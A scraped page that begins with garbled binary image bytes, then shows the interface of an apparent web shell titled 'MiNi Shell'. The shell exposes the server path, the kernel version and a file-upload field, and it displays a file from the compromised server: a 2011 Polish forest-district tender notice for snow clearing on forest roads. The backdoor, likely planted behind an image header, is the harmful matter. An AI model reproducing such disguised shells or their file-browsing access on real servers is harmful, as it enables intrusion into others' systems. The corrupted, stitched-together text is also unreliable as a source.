JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111222/342177-N-2011.html

<p class="kh_header"><b>Lutowiska: Odśnieżanie dróg leśnych na terenie Nadleśnictwa Lutowiska do 30.04.2013 roku  NZ-2710- 18 /11</b><br>
<b>Numer ogłoszenia: 342177 - 2011; data zamieszczenia: 22.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe Nadleśnictwo Lutowiska , Lutowiska 4, 38-713 Lutowiska, woj. podkarpackie, tel. 013 4610168 w. 43, faks 013 4610168.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krosno.lasy.gov.pl/web/lutowiska   tel.: 0-13 461 01 68,  fax.: 0-13 461 03 88</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odśnieżanie dróg leśnych na terenie Nadleśnictwa Lutowiska do 30.04.2013 roku  NZ-2710- 18 /11.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pkt .3.1. SIWZ  Przedmiotem zamówienia jest mechaniczne odśnieżanie dróg leśnych na terenie Nadleśnictwa Lutowiska o łącznej długości 141 km, pasem o szerokości  minimum 3,0 m z odśnieżeniem istniejących mijanek, posypaniem podjazdów i zakrętów dróg żużlem paleniskowym dostarczonym przez Zamawiającego do wyznaczonych miejsc, wraz z odśnieżeniem przyległych użytkowanych składów drewna.
        Zamawiający we własnym zakresie dostarcza żużel paleniskowy, który zgromadzony jest na hałdach w ustalonych miejscach na terenie nadleśnictwa.
Wykonawca we własnym zakresie zabezpieczy żużel przed zamarzaniem.
Odśnieżanie należy wykonać przy pomocy ciągnika kołowego z napędem na cztery koła, zaopatrzonego w pług śniegowy-czołowy typu ciężkiego.
Prędkość robocza nie może przekraczać 10km/h. 

Zamawiający dopuszcza składanie ofert częściowych z podziałem jak niżej:

Część I
- Leśnictwa Nasiczne, Tworylczyk, Hulskie, Sękowiec, Jawornik 
56km x17=952km,

Część II 
- Leśnictwa Czarna, Polana, Skorodne, Paniszczew 29kmx20=580km, 

Część III
- Leśnictwa Chmiel 12km x 17=204km,

Część IV
- Leśnictwo Rosochate14km x 20=280km,

Część V
- Leśnictwo Lipie 10km x 17=170km,

Część VI 
- Leśnictwo Dwernik 11km x 17=187km,

Część VII
- Leśnictwo Dwerniczek 9km x 20=180km..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o   
 których mowa w art. 67 ust. 1 pkt. 6 ustawy, polegających na powtórzeniu prac   
 będących przedmiotem zamówienia lub jego części o wartości do 50% 
 wartości zamówienia podstawowego (wartości umowy) w okresie 3 lat od 
 udzielenia zamówienia podstawowego (od terminu podpisania umowy).  
 Zamówienie uzupełniające dotyczy prac ujętych w SIWZ.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Pkt. 8. SIWZ Wadium
         8.1. Zamawiający żąda zabezpieczenia oferty w postaci wadium w wysokości 

300 zł   (na każdą część oddzielnie).

8.2. Wadium może być wnoszone w jednej lub kilku      
     następujących  formach: 
        a) pieniądzu; 
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek wskazany przez Zamawiającego;
Numer rachunku bankowego na który należy wnosić wadium: 
 Bank BGŻ SA oddz. w Sanoku, 
 konto nr 26 2030 0045 1110 0000 0153 5050
z dopiskiem na  blankiecie lub w tytule przelewu, jakiego postępowania i jakiej części dotyczy,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e)  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
8.3. Wadium wnoszone w innych formach niż pieniądz należy deponować w oryginale w kasie w siedzibie Zamawiającego  do dnia składania ofert  30.12.2011r., do godz.12.00.	
     Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób    
     reprezentacji Gwaranta (poręczyciela). Poręczenie, gwarancja musi być               
     podpisana   przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta   
     (poręczyciela). Podpis winien być sporządzony w sposób umożliwiający jego 
     identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem  
     imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe 
     zobowiązanie Gwaranta do wpłaty Zamawiającemu pełnej kwoty wadium w 
     okolicznościach określonych w art. 46 ust. 4 a i ust. 5 ustawy, na każde pisemne   
     żądanie zgłoszone przez Zamawiającego w terminie związania ofertą.

8.4. Wadium musi być wniesione najpóźniej do wyznaczonego terminu    
      składania ofert tj. do dnia składania ofert 30.12.2011r., do godz. 12.00.
      
     Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym 
      terminie znajdzie się na rachunku bankowym Zamawiającego.

8.5. Wykonawca, który nie wniesie wadium zostanie wykluczony z postępowania, 
     a jego oferta zostanie uznana za odrzuconą.
a) Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza. 
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego,
  b)  Zamawiający niezwłocznie zwraca wadium na wniosek Wykonawcy który 
      wycofał ofertę przed upływem terminu składania ofert,
  c)  Wadium Wykonawcy zostanie zatrzymane wraz z odsetkami w przypadku, gdy  
      Wykonawca:
 -  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy nie złożył dokumentów lub oświadczeń, o których mowa w art.  25 ust. 1 ustawy lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn  nieleżących po jego stronie,
-   odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach  
    określonych w ofercie, 

- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
     z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy PZP,  w tym dotyczące:

Pkt.5 a)  SIWZ posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
        
Zamawiający uzna że warunek będzie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu  -  załącznik  nr 3a do SIWZ.
oraz  którzy   Pkt. 5 e)  SIWZ nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24   ust. 1 ustawy).

 Ocena w oparciu o przedstawione dokumenty pkt. 6.2. SIWZ


(Pkt. 6.2. SIWZ) W celu wykazania braku podstaw do wykluczenia Wykonawcy z  
      postępowania o udzielenie zamówienia (art. 24 ust 1 ustawy ) oferta 
      winna zwierać:

a) Oświadczenie o braku podstaw do wykluczenia z art. 24 ust. 1 ustawy PZP wg  wzoru, stanowiącego załącznik nr 4.


Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt. 6 SIWZ. 
Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww warunki wykonawca spełnił. Nie spełnienie chociażby jednego z ww warunków skutkować będzie wykluczeniem  wykonawcy z postępowania a ofertę uznaje się za odrzuconą.  Wykonawca ma prawo   złożyć tylko jedną ofertę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku,  jeżeli Wykonawca w okresie ostatnich 3 lat zrealizował  przynajmniej jedną podobną usługę, odpowiadającą swoim rodzajem i wartością usługom stanowiącym przedmiot a jeżeli okres wykonywania działalności jest krótszy  - w tym okresie, jakie obejmuje zamówienie, potwierdzone referencjami, opiniami, listami polecającymi, wydrukami z Systemu Informatycznego Lasów Państwowych  Karta Konta Wierzyciela itp.   o  wartości całkowitej nie mniejszej  niż 6 tys. zł (niezależnie od ilości części na które Wykonawca składa ofertę).
      Przeliczenia podanych w Wykazie wykonywanych usług wartości w walucie obcej, na złote polskie należy dokonać na dzień zakończenia realizacji zamówienia potwierdzającego posiadanie stosownego doświadczenia (według średniego kursu NBP dla danej waluty), dla polisy lub innego dokumentu potwierdzającego posiadanie ubezpieczenia OC w zakresie prowadzonej działalności - wg kursu (według średniego kursu NBP dla danej waluty) z dnia jego wystawienia.

         Ocena warunku w oparciu o wykaz wykonywanych usług  w ciągu ostatnich 3 lat oraz załączone dokumenty potwierdzające należyte wykonanie tych usług.


Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt. 6 niniejszej SIWZ. 
Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww warunki wykonawca spełnił. Nie spełnienie chociażby jednego z ww warunków skutkować będzie wykluczeniem  wykonawcy z postępowania a ofertę uznaje się za odrzuconą.  Wykonawca ma prawo   złożyć tylko jedną ofertę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać lub dysponować co najmniej:
-  jednym ciągnikiem kołowym, o mocy minimum 80 KM, wyposażonym w pług śniegowy ciężki z dociskiem hydraulicznym. Pług musi posiadać możliwość wymiany lemiesza na gumowy lub stalowy, a także dysponować zawieszanym pojemnikiem lub przyczepą do przewozu żużla paleniskowego wraz ze sprzętem do jego załadunku i posypaniem.

Uwaga:
       Jeżyli Wykonawca składa ofertę na  Część I (tj. Leśnictwa Nasiczne, Tworylczyk, Hulskie, Sękowiec, Jawornik) lub więcej niż jedną Część zamówienia musi posiadać lub dysponować minimum dwoma  wyżej opisanymi jednostkami sprzętowymi oraz minimum dwoma osobami posiadające uprawnienia do kierowania ciągnikiem.


Ocena spełnienie warunku w oparciu o:
-  wykaz  niezbędnych do wykonania narzędzi, urządzeń i sprzętu jaki posiada 
    (dysponuje) Wykonawca wraz z informacją o podstawie dysponowania.


Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt. 6 SIWZ. 
Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww warunki wykonawca spełnił. Nie spełnienie chociażby jednego z ww warunków skutkować będzie wykluczeniem  wykonawcy z postępowania a ofertę uznaje się za odrzuconą.  Wykonawca ma prawo   złożyć tylko jedną ofertę.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać lub dysponować co najmniej
-    jedną osobą posiadająca uprawnienia do kierowania ciągnikiem,

Uwaga:
       Jeżyli Wykonawca składa ofertę na  Część I (tj. Leśnictwa Nasiczne, Tworylczyk, Hulskie, Sękowiec, Jawornik) lub więcej niż jedną Część zamówienia musi posiadać lub dysponować minimum dwoma  wyżej opisanymi jednostkami sprzętowymi oraz minimum dwoma osobami posiadające uprawnienia do kierowania ciągnikiem.

Ocena spełnienie warunku w oparciu o:

-    wykaz osób które będą uczestniczyć w wykonywaniu zamówienia wraz z 
     informacją o podstawie dysponowania.
Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt. 6  SIWZ. 
Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww warunki wykonawca spełnił. Nie spełnienie chociażby jednego z ww warunków skutkować będzie wykluczeniem  wykonawcy z postępowania a ofertę uznaje się za odrzuconą.  Wykonawca ma prawo   złożyć tylko jedną ofertę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem zamówienia z sumą ubezpieczenia nie mniejszą niż 15 tys.  zł (niezależnie od ilości części na które Wykonawca składa ofertę).

          
Przeliczenia podanych w Wykazie wykonywanych usług   wartości w walucie obcej, na złote polskie należy dokonać na dzień zakończenia realizacji zamówienia potwierdzającego posiadanie stosownego doświadczenia (według średniego kursu NBP dla danej waluty), dla polisy lub innego dokumentu potwierdzającego posiadanie ubezpieczenia OC w zakresie prowadzonej działalności - wg kursu (według średniego kursu NBP dla danej waluty) z dnia jego wystawienia.

Ocena w oparciu o opłaconą polisę lub inny dokument potwierdzający, że 
Wykonawca   jest ubezpieczony od odpowiedzialności cywilnej w zakresie 
   prowadzonej działalności  związanej z przedmiotem zamówienia.


Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt. 6 SIWZ. 
Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww warunki wykonawca spełnił. Nie spełnienie chociażby jednego z ww warunków skutkować będzie wykluczeniem  wykonawcy z postępowania a ofertę uznaje się za odrzuconą.  Wykonawca ma prawo   złożyć tylko jedną ofertę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Pkt.16. SIWZ Istotne dla stron postanowienia zawiera projekt umowy 
         Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie:
16.1. zakresu prac w przypadku gdy  wykonanie całości zamówienia okaże się zbędne z uwagi na warunki atmosferyczne.  Związana z tym zmiana wysokości wynagrodzenia uzgodniona zostanie z wybranym oferentem w aneksie do umowy. Wykonawca nie będzie sobie rościł prawa do odszkodowania z tytułu wyłączenia lub zmiany zakresu robót.
16. 2. potrzeby wprowadzenia zmian w sposobie wykonania przedmiotu   
niniejszego postępowania, wynikających ze zmian technologicznych,   spowodowanych zmianami w przepisach prawa, norm, standardów i innymi    
okolicznościami,
 16.3. zmiany wynagrodzenia w przypadku zmian stawki podatku VAT,   
   wynikających   z obowiązujących w tym zakresie przepisów.
                         Ponadto Zamawiający dopuszcza możliwość zmian będących następstwem zmian danych zarówno jego jak i Wykonawcy, w tym ujawnionych w rejestrach publicznych (np. zmiana oznaczenia adresu, nazwy wykonawcy, osoby uprawnionej do kontaktów) oraz innych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty. W takiej sytuacji, wprowadzenie do umowy stosownych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty nie będzie wymagało zachowania formy pisemnej, a jedynie notatki/protokołu zatwierdzonego przez przedstawicieli obu stron.
                   Wszelkie zmiany wprowadzane do umowy dokonywane będą z poszanowaniem obowiązków wynikających z przepisów prawa, w tym w szczególności nie mogą powodować wykroczenia poza określenie przedmiotu zamówienia zawarte w SIWZ, zgodnie z art. 140 ust. 3 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.) oraz nie mogą powodować obejścia przepisu art. 144 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_lutowiska/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Lutowiska
Lutowiskach, 38-713  Lutowiska 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2011 godzina 12:00, miejsce: Ofertę należy złożyć w zamkniętej kopercie w siedzibie Zamawiającego- Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Pkt. 2. SIWZ Tryb udzielenia zamówienia
         Do udzielenia przedmiotowego zamówienia stosuje się przepisy ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (tekst ujednolicony Dz. U. z 2010r.  nr 113, poz. 759  z póź. zm.), zwanej dalej ustawą lub ustawą Pzp  oraz w sprawach nieuregulowanych ustawą, przepisy ustawy - Kodeks cywilny.
Postępowanie jest prowadzone w trybie przetargu nieograniczonego na podstawie art. 39 - 46 ustawy do kwoty 125 tys. euro.

Pkt. 3.5. SIWZ Informacje o ofercie wariantowej, umowie ramowej i aukcji elektronicznej:
     - Zamawiający nie dopuszcza składania ofert wariantowych,
     - Zamawiający nie przewiduje zawarcia umowy ramowej,
     - Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem    
        aukcji elektronicznej ani utworzenia dynamicznego systemu zakupów.

Pkt. 3.6. SIWZ. Zamówienia częściowe.
      Ofertę można złożyć na jedną lub więcej części. 



Pkt. 6. SIWZ Informacje o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu oraz w celu wykazania braku podstaw do wykluczenia.

Pkt. 6.1. SIWZ Oświadczenia i dokumenty jakie wykonawcy mają dostarczyć w celu potwierdzenia spełniania warunków udziału w postępowaniu:

a) oświadczenie, że wykonawca spełnia warunki udziału w postępowaniu, określone  w art. 22 ust. 1 ustawy Pzp - wg wzoru załącznik nr 3a do SIWZ,

b)  wykaz wykonywanych usług  wykonanych należycie w okresie ostatnich 3 lat - załącznik nr 5 do SIWZ wraz z dokumentami potwierdzającymi że zamówienia te zostały wykonane należycie referencje, listy polecające itp.,  

c) wykaz osób które będą uczestniczyć w wykonywaniu zamówienia, z  podaniem ich kwalifikacji zawodowych, według załącznika nr 6 do SIWZ,

d) wykaz niezbędnych do wykonania narzędzi i urządzeń, jakie posiada (dysponuje) wykonawca załącznik nr 7   do SIWZ,  
 	
